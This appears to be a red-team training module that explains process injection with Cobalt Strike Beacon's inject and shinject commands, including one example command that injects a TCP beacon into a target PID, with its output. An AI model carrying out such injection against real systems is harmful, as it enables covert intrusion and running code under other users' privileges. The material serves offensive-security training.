# Process Injection

Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into its memory. In a non-elevated context, which usually limits you to your own processes. In an elevated context, this includes processes owned by other users.

Beacon has two main injection commands - `shinject` and `inject`. `shinject` allows you to inject any arbitrary shellcode from a binary file on your attacking machine; and `inject` will inject a full Beacon payload for the specified listener.

If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

```
beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102
```

\\

Where:

* 4464 is the target PID.
* x64 is the architecture of the process.
* tcp-local is the listener name.

\\

The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.

\\

![](https://files.cdn.thinkific.com/file_uploads/584845/images/49e/e38/b9f/injection.png)

\\

The same caveats also apply - if the user closes this process, the Beacon will be lost. The shellcode that's injected uses the Exit Thread function, so it won't kill the process if we exit the Beacon.